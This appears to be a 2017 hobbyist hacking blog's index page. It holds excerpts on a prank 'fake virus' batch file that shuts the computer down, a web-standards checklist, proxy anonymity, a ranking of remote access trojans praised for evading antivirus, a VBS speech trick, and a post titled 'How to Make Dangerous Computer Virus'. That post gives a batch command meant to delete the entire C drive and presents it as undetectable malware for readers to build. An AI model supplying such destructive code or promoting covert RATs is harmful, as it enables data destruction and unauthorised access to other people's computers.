Posts

Showing posts from 2017

How to Make a Fake Virus With a Batch File

       In this post I will be showing you how to make a batch file, that should fool your friends into thinking that their computer has a virus. It will look something like the above image when it's running. At the end of the program a message will pop up that says "Your computer has committed suicide. Good-bye". Then the computer will shutdown. To cancel the shutdown process type "shutdown /a" into command prompt and press enter. Step 1: Open Notepad Step 2: Write the Program If you have experience writing batch files feel free to modify and improve the below code, If you don't have experience than simply copy and paste the code into notepad. Save the file as a ".bat" file, such as "Virus.bat". @echo off title Cyber Attack Sequence Initiation color 02 echo Warning-Complete File Corruption imminent. timeout /t 3 /nobreak >nul CLS echo Complete file corruption and computer shutdown in 10 timeout /t 1 /nobreak >nul ClS e

A Web Standards Checklist, How to make a proper website

A web standards checklist    The term web standards can mean different things to different people. For some, it is 'table-free sites', for others it is 'using valid code'. However, web standards are much broader than that. A site built to web standards should adhere to standards (HTML, XHTML, XML, CSS, XSLT, DOM, MathML, SVG etc) and pursue best practices (valid code, accessible code, semantically correct code, user-friendly URLs etc). In other words, a site built to web standards should ideally be lean, clean, CSS-based, accessible, usable and search engine friendly. About the checklist This is not an uber-checklist. There are probably many items that could be added. More importantly, it should not be seen as a list of items that must be addressed on every site that you develop. It is simply a guide that can be used: * to show the breadth of web standards * as a handy tool for developers during the production phase of websites * as an aid for developers w

Anonymity of Proxy

Anonymity of Proxy    The exchange of information in Internet is made by the "client - server" model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server. What your browser transmits to a web-server: a name and a version of an operating system a name and a version of a browser configuration of a browser (display resolution, color depth, java / javascript support, ...

Top 10 Popular RAT (Remote Access Trojan) of 2017

Image
What is RAT?    RAT means Remote Access Tool or Remote Access Trojan. RAT can be used legally and illegally. Legally used by an administrator to monitor his clients and Illegally by any person to steal or access information of any person without that person knowing. RAT is a very powerful tool capable of doing things that can cause major loss.    #10 : JSPY          JSPY is a java based RAT. The main feature of  JSPY is that it can not be detected by any kind of anti virus. JSPY does the job of a crypter by itself so there is no longer need of crypter. This Rat is not very stable and user friendly that's why it is on number 10. J SPY #9: AndroRAT       AndroRAT is based on client/server connection.This RAT is used to get access of Android only.There is no other RAT to get access of android like AndroRAT. This RAT can give many information about the device and also can run some commands remotely. AndroRat #8: Pandora RAT             Pandora RAT is ava

Is Your Computer Male or Female ?

Image
Do you think what is the gender of your Computer ? This cool trick will tell you about your computer gender whether it is male or female. This trick will work on all Operating System. So Without wasting Time Lets get start !! Just Follow These Simple Steps: Open Notepad and paste the following Code. CreateObject("SAPI.SpVoice").Speak"i love you" Save this file as gender.vbs Now, Open the save file. If you hear Male voice then your computer is male and if you hear Female voice then your computer is female.  I have a Female gender computer !! Try Yours too ?? Share this cool trick with your friends :)

How to Make Dangerous Computer Virus in a Minute ?

Image
In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus. What will this virus do ?    You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming. How to Make the virus ?     1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y    2. Save this file as virus.bat (Name can be anything but .bat is must)    3. Now, running this file will delete all the content of C Drive. Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage don